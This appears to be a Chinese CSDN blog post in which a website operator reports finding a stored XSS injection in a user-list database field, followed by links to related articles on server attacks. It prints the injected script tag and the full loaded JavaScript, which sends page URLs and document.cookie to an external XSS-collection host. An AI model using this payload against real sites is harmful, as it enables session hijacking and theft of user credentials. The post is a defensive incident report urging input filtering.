记一次服务器遭遇黑客攻击

最新推荐文章于 2023-12-21 13:56:57 发布
最新推荐文章于 2023-12-21 13:56:57 发布
阅读量324 收藏
点赞数
分类专栏: js 黑客攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f43310/article/details/84821504
版权

运营了一个网站,今天突然后台用户列表打开只有一条记录,还是半截。直觉告诉是字段出了问题,数据库查看一下这条记录的字段,一看下了一跳,竟然是js 注入攻击

<sCRiPt/SrC=//baidu.xiaoxiaowu.me/Jg3G>

这段代码链接到了一个js文件,不知道这个文件的作用,有谁知道告诉一下。

(function() { (new Image()).src = 'http://xss.azwines.com.cn/xss.php?do=api&id=Jg3G&location=' + escape((function() {
        try {
            return document.location.href
        } catch(e) {
            return ''
        }
    })()) + '&toplocation=' + escape((function() {
        try {
            return top.location.href
        } catch(e) {
            return ''
        }
    })()) + '&cookie=' + escape((function() {
        try {
            return document.cookie
        } catch(e) {
            return ''
        }
    })()) + '&opener=' + escape((function() {
        try {
            return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
        } catch(e) {
            return ''
        }
    })());
})();
if ('1' == 1) {
    keep = new Image();
    keep.src = 'http://xss.azwines.com.cn/xss.php?do=keepsession&id=Jg3G&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};

看来过滤用户的输入非常重要,这虽然没有攻击成功,但是给了我一个严重的教训。

数据库中的样子

蜗蜗奶糖
关注
专栏目录
天呐,我的服务器竟然也被黑客攻击了!
江南一点雨的专栏
05-11 2386
真是想不到,这种事竟然也生在我身上。大概是在 2017 年底,为了某种(大家懂)便利,松哥购买了个 VULTR 服务器,一个月也就 2.5 刀,除了日常的科学上网需求外,...
企业网站服务器遭到黑客入侵? 如何做好安全防护
qq_780662763的博客
03-11 648
好多企业网站遭遇黑客攻击,像黑客入侵在互联网只要有数据网络,就能使用数据网络远程操作目标的笔本电脑、网络服务器、企业网站,从而任意地读取或篡改目标的重要数据,又又或者使用目标系统软件上的功能模块,比如对手机的麦克风开展监听,开启对方摄像头开展监控,使用已经被入侵的设备计算能力开展挖矿从而得到虚拟货币,使用目标设备的网络带宽能力发动CC并发攻击方式其他人等等。又或者是破解了一个数据库服务器的密码,...
服务器被黑遭攻击,凌晨一点紧急预案逆袭!
Enweitech Software Works
04-04 2433
“凌晨 1 点,接到朋友的求助,网站被黑了,访问网站首页会自动定向到一个赌博网站,这个时间点都是该进入梦乡的时间,直接开干。本文分为以下五个部分介绍:入侵情况分析服务器一次安全处理服务器第二次安全处理日志分析和追踪总结及分析入侵情况分析查看首页代码通过查看首页(index.html/index.php)源代码发现网站存在 3 处编码后的代码,如图 1 所示,分别在 title、meta 属性中加...
最详细预防服务器被攻击已经被攻击的解决方法
weixin_67757219的博客
02-02 355
毕竟,你的服务器会很快失效,而且当整个网络不可达,还是有很多原因需要详审的。当很多堡垒被主机感染,并一起向你的服务器发起拒绝服务攻击的时候,你将伤痕累累。在最简单的形式下,这些攻击都是使服务器或网络的负载过重,这意味着黑客的网络速度必须比目标的网络速度要快。每个网站系统或程序或多或少都会有一些漏洞,这是无法避免的,或者是系统本身存在,或者是系统管理员写代码出错造成的漏洞,都应该及时更新。进行分析,查看攻击者是通过什么方式入侵到服务器的,通过分析找出系统所存在的漏洞。是攻击的重要入口,是服务器外部的窗口。
【黑客帝国-代码雨】超火(免费送)(17)
热门推荐
qq_42139049的博客
12-04 9万+
抖音超火:黑客帝国代码雨
服务器被恶意攻击怎么办?
PAINzw的博客
11-13 2115
服务器被恶意攻击了怎么办? 随着互联网的迅速发展,网络安全面临着严峻的挑战,一些恶意的服务器攻击行为也层出不穷。无论是正规企业网站、游戏网站、购物网站或是棋牌室、文娱网站,许多用户由于各类攻击使网站溃散,服务器强行关闭,客户不能访问,私密信息泄露,而导致利益损失。今天小驰就来跟大家讲一讲,针对服务器的恶意攻击行为应该如何应对? 总的来说,危害网络安全有2种行为:一种是攻击行为,例如拒绝服务攻击和网络病毒等,浪费服务器资源、干扰系统正常的运行;另一种是入侵行为,泄露服务器隐私信息、破坏服务器
阿里云服务器被攻击危害有多大
xyyaq的博客
04-07 446
根据全球游戏和全球移动互联网行业第三方分析机构Newzoo的数据显示:2017年上半年,中国以275亿美元的游戏市场收入超过美国和日本,成为全球榜首。 游戏行业的快速发展、高额的攻击利润、日趋激烈的行业竞争,让中国游戏行业的进军者们,每天都面临业务和安全的双重挑战。 游戏行业一直是竞争、攻击最为复杂的一个江湖。 曾经多少充满激情的创业团队、玩法极具特色的游戏产品,被互联网攻击的问题扼杀在摇篮里;又有多少运营出色的游戏产品,因为遭受DDoS攻击,而一蹶不振。 DDoS攻击的危害 小蚁安盾安全发布的20
阿里云服务器被攻击的危害有多大
XiaoYiLiangZai的博客
03-30 368
游戏行业的快速发展、高额的攻击利润、日趋激烈的行业竞争,让中国游戏行业的进军者们,每天都面临业务和安全的双重挑战。 游戏行业一直是竞争、攻击最为复杂的一个江湖。 曾经多少充满激情的创业团队、玩法极具特色的游戏产品,被互联网攻击的问题扼杀在摇篮里;又有多少运营出色的游戏产品,因为遭受DDoS攻击,而一蹶不振。 DDoS攻击的危害 小蚁安盾安全发布的2017年上半年的游戏行业DDoS攻击态势报告中指出:2017年1月至2017年6月,游戏行业大于300G以上的攻击超过1800次,攻击最大峰值为608G..
一次渗透测试信息收集(证书+c段+历史漏洞搜索)
最新发布
爱玩游戏的黑客的博客
12-21 1172
信息收集(证书+c段+历史漏洞搜索)
MySQL数据库连接安全加固:防范黑客攻击与数据泄露,保障数据库安全
### 1.1 黑客攻击手段与数据泄露风险 MySQL数据库作为企业核心资产,面临着日益严峻的安全威胁。黑客利用各种攻击手段,如暴力破解、SQL注入、跨站脚本攻击等,试图窃取或破坏敏感数据。数据泄露事件不仅会造成经济...
服务器攻击常见的手段有哪些
Sousuyi的博客
12-30 1969
1、 SQL注入使用后台漏洞通过要在数据库中销毁的URL将关键SQL语句引入程序。许多黑客会使用F12或postman等程序集Ajax请求向后台发送非法号码,造成程序错误,并向页面公开异常,这样服务器攻击者就可以知道后台使用的语言和框架。2、 网络嗅探器通过互联网查看数据包抓取密码和内容,通过监听程序可以监控网络数据流,从而获取用户登录账号和密码。3、 拒绝服务这是一种常见的服务器攻击方式,通过反复向站点服务器发送请求,导致大量请求无法承载和“拒绝服务”。4、 钓鱼网站这种方法需要黑帽子建立一个钓鱼网站,了
服务器黑客攻击快速解决方案
nszm88668的博客
06-24 2611
黑客攻击 快速解决
服务器被黑客入侵了怎么办?
驰网飞飞的博客
09-27 1265
遇到服务器被黑,很多人会采用拔网线、封 iptables 或者关掉所有服务的方式应急,但如果是线上服务器就不能立即采用任何影响业务的手段了,需要根据服务器业务情况分类处理。 下面我们看一个标准的服务器安全应急影响应该怎么做,也算是笔者从事安全事件应急近 6 年以来的一些经验之谈,借此抛砖引玉,希望大神们不吝赐教~ 如上图,将服务器安全应急响应流程分为如下 8 个环节: · 发现安全事件(核实) · 现场保护 · 服务器保护 · 影响范围评估 · 在线分析 · 数据备份 · 深入分析 · 事件报告整理 接
服务器黑客攻击了,如何去处理?
Johncdn123的博客
08-16 1676
服务器被攻击一般有两种比较常见的方式:一是恶意的攻击行为,如拒绝服务攻击,网络病毒等等,这种方式就是消耗服务器资源,影响服务器的正常运作,甚至服务器所在网络的瘫痪;另外一个就是恶意的入侵行为,这种行为更是会导致服务器敏感信息泄露,入侵者更是可以为所欲为,肆意破坏服务器。所以我们要保证网络服务器的安全可以说就是尽量减少网络服务器受这两种行为的影响。国外服务器防黑客干扰要注意以下几个方面: 1、选用安全的口令,口令应该包括大写字母,小写字母及数字,有控制符更好 2、定期分析系统日志 3、谨慎开放缺乏安全保
一次服务器黑客攻击(暴力破解密码)的
zhaojiafu的博客
09-18 3094
文章目录说明:1、我是怎么发现的呐?2、开始弥补我的过错①、查看阿里云②、重置服务器+修改密码③、修改安全组 说明: 其实我没有想过我的服务器黑客攻击,直到我今天发现,其实还好是自己的服务器我急搭建个学习的测试而已,如果是工作中的可就真的尴尬了,所以,有服务器的小伙伴注意了,端口号访问要做限制ip,尽量限制自己的公司ip和家里ip,还有登陆密码设置难一点,防止被暴力破解。 限制访问端口22登陆ip+密码设置长点难点,双保险吧。 我的一直觉得弄着玩,主要自己对服务器的了解不是这么多。今天正好学习下了。 1、
你不曾察觉的隐患:危险的 target="_blank" 与 “opener”
Chris__wang的博客
09-18 387
    在网页中使用链接时,如果想要让浏览器自动在新的标签页打开指定的地址,通常的做法就是在 a 标签上添加 target等于"_blank" 属性。 然而,就是这个属性,为钓鱼攻击者带来了可乘之机。 起源 parent 与 opener  在说 opener 之前,可以先聊聊 &lt;iframe&gt; 中的 parent。 我们知道,在 &lt;iframe&gt; 中提供了...
危险的 target=“_blank” 与 “opener”
码飞_CC的博客
07-09 734
在学习安全研发规范的时候,发现一条规则“通过 A 标签跳转到其他页面且使用 target=_blank 时,必须添加 rel=noopener 属性”,这个以前还真没了解到,遂查询了一下,发现一片文章写得挺不错的,这里就不自己写,转载一下了(危险的 target="_blank" 与 “opener”) 以下来自转载: 在网页中使用链接时,如果想要让浏览器自动在新的标签页打开指定的地址,通常的做法就是在 a 标签上添加 target等于"_blank" 属性。 然而,就是这个属性,为钓鱼攻击者带来了可乘之
前端黑魔法之远程控地址控制栏之钓鱼攻击
Websec
03-22 946
原文来自:https://www.leavesongs.com/PENETRATION/use-target-to-spoof-fishing.html参考文章:https://paper.seebug.org/538/今晚刚好关注了某个大牛的博客,看到第一篇文章的时候就涨知识了,这个原理值得我们学习,顺便就拿到这里来分享一波啦0x01:效果图如下:地址:http://675ba661.2m1.p...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值